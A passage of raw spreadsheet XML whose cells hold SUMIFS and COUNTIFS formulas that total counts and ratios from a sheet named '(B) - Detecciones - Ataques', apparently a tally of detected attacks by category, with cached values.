        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>11</v>
      </c>
      <c r="CI78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>5</v>
      </c>
      <c r="CJ78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>4</v>
      </c>
      <c r="CK78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>25</v>
      </c>
      <c r="CL78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>294</v>
      </c>
      <c r="CN78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>4</v>
      </c>
      <c r="CO78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>28</v>
      </c>
      <c r="CP78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>112</v>
      </c>
      <c r="CQ78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>19</v>
      </c>
      <c r="CR78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>4175</v>
      </c>
      <c r="CT78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>12</v>
      </c>
      <c r="CU78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>8</v>
      </c>
      <c r="CW78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>29</v>
      </c>
      <c r="CY78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>51</v>
      </c>
      <c r="CZ78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>14</v>
      </c>
      <c r="DE78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>19</v>
      </c>
      <c r="DF78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>11</v>
      </c>
      <c r="DG78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>1373</v>
      </c>
      <c r="DI78" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>5570</v>
      </c>
      <c r="DJ78" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$FW3:$FW139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>22</v>
      </c>
      <c r="DK78" s="271"/>
      <c r="DO78" s="279"/>
      <c r="DP78" s="271"/>
      <c r="DQ78" s="271"/>
      <c r="DR78" s="271"/>
      <c r="DS78" s="271"/>
      <c r="DT78" s="271"/>
      <c r="DU78" s="271"/>
      <c r="DV78" s="271"/>
      <c r="DW78" s="271"/>
      <c r="DX78" s="271"/>
      <c r="DY78" s="271"/>
      <c r="DZ78" s="271"/>
      <c r="EA78" s="271"/>
      <c r="EB78" s="271"/>
      <c r="EC78" s="271"/>
      <c r="ED78" s="280"/>
      <c r="EG78" s="279"/>
      <c r="EH78" s="271"/>
      <c r="EI78" s="271"/>
      <c r="EJ78" s="271"/>
      <c r="EK78" s="271"/>
      <c r="EL78" s="271"/>
      <c r="EM78" s="271"/>
      <c r="EN78" s="483"/>
      <c r="EO78" s="478"/>
      <c r="EP78" s="478"/>
      <c r="EQ78" s="478"/>
      <c r="ER78" s="478"/>
      <c r="ES78" s="271"/>
      <c r="ET78" s="271"/>
      <c r="EU78" s="271"/>
      <c r="EV78" s="271"/>
      <c r="EW78" s="271"/>
      <c r="EX78" s="271"/>
      <c r="EY78" s="271"/>
      <c r="EZ78" s="271"/>
      <c r="FA78" s="280"/>
      <c r="FD78" s="480"/>
      <c r="FE78" s="480"/>
      <c r="FF78" s="480"/>
      <c r="FG78" s="480"/>
      <c r="FH78" s="480"/>
      <c r="FI78" s="480"/>
      <c r="FJ78" s="480"/>
      <c r="FK78" s="480"/>
      <c r="FL78" s="480"/>
      <c r="FM78" s="480"/>
      <c r="FN78" s="480"/>
      <c r="FO78" s="480"/>
      <c r="FP78" s="480"/>
      <c r="FQ78" s="480"/>
      <c r="FR78" s="480"/>
      <c r="FS78" s="480"/>
      <c r="FT78" s="480"/>
      <c r="FU78" s="480"/>
      <c r="FV78" s="480"/>
      <c r="FW78" s="480"/>
      <c r="FX78" s="480"/>
      <c r="FY78" s="422" t="s">
        <v>558</v>
      </c>
      <c r="FZ78" s="503">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY61)+SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY61 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY61)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY61 &amp; "*"))</f>
        <v>0.4994456763</v>
      </c>
      <c r="GA78" s="504">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY61)+SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY61 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY61)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY61 &amp; "*"))</f>
        <v>0.5</v>
      </c>
      <c r="GB78" s="480"/>
      <c r="GC78" s="422" t="s">
        <v>558</v>
      </c>
      <c r="GD78" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY61)+SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY61 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY61)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY61 &amp; "*"))</f>
        <v>0.4994456763</v>
      </c>
      <c r="GE78" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY61)+SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY61 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY61)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY61 &amp; "*"))</f>
        <v>0.5</v>
      </c>
      <c r="GF78" s="480"/>
      <c r="GG78" s="480"/>
      <c r="GH78" s="480"/>
      <c r="GI78" s="480"/>
      <c r="GJ78" s="480"/>
      <c r="GK78" s="480"/>
      <c r="GL78" s="480"/>
      <c r="GM78" s="480"/>
      <c r="GN78" s="480"/>
      <c r="GO78" s="480"/>
      <c r="GP78" s="480"/>
      <c r="GQ78" s="480"/>
      <c r="GR78" s="480"/>
      <c r="GS78" s="480"/>
      <c r="GT78" s="480"/>
      <c r="GU78" s="480"/>
      <c r="GV78" s="480"/>
      <c r="GW78" s="480"/>
      <c r="GX78" s="480"/>
      <c r="GY78" s="480"/>
      <c r="GZ78" s="480"/>
      <c r="HA78" s="480"/>
      <c r="HB78" s="480"/>
      <c r="HC78" s="480"/>
      <c r="HD78" s="480"/>
      <c r="HE78" s="480"/>
      <c r="HF78" s="480"/>
      <c r="HG78" s="480"/>
      <c r="HH78" s="480"/>
      <c r="HI78" s="480"/>
      <c r="HJ78" s="480"/>
      <c r="HK78" s="480"/>
      <c r="HL78" s="480"/>
      <c r="HM78" s="480"/>
      <c r="HN78" s="480"/>
      <c r="HO78" s="480"/>
      <c r="HP78" s="480"/>
    </row>
    <row r="79">
      <c r="J79" s="277"/>
      <c r="K79" s="434"/>
      <c r="L79" s="353"/>
      <c r="M79" s="353"/>
      <c r="N79" s="354"/>
      <c r="O79" s="278"/>
      <c r="Q79" s="271"/>
      <c r="R79" s="505" t="s">
        <v>2549</v>
      </c>
      <c r="S79" s="506">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>29429</v>
      </c>
      <c r="T79" s="506">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>28543</v>
      </c>
      <c r="U79" s="506">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>261</v>
      </c>
      <c r="V79" s="506">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>89</v>
      </c>
      <c r="W79" s="506">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>30</v>
      </c>
      <c r="X79" s="506">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>49454</v>
      </c>
      <c r="Y79" s="506">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>25</v>
      </c>
      <c r="Z79" s="506">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>481170</v>
      </c>
      <c r="AA79" s="506">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>47</v>
      </c>
      <c r="AB79" s="506">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>244</v>
      </c>
      <c r="AC79" s="506">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>106</v>
      </c>
      <c r="AD79" s="506">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>4190</v>
      </c>
      <c r="AE79" s="506">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>18</v>
      </c>
      <c r="AF79" s="507">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>6927</v>
      </c>
      <c r="AG79" s="271"/>
      <c r="AH79" s="505" t="s">
        <v>2549</v>
      </c>
      <c r="AI79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>29415</v>
      </c>
      <c r="AJ79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>13</v>
      </c>
      <c r="AL79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>28543</v>
      </c>
      <c r="AN79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>239</v>
      </c>
      <c r="AR79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>4</v>
      </c>
      <c r="AS79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>2</v>
      </c>
      <c r="AU79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>6</v>
      </c>
      <c r="AV79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>10</v>
      </c>
      <c r="AW79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>56</v>
      </c>
      <c r="AY79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>3</v>
      </c>
      <c r="BA79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>30</v>
      </c>
      <c r="BB79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>49454</v>
      </c>
      <c r="BD79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>0</v>
      </c>
      <c r="BI79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>2</v>
      </c>
      <c r="BK79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>23</v>
      </c>
      <c r="BL79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM79" s="508">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GF3:$GF139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>149866</v>
      </c>
      <c r="BN79" s="508">
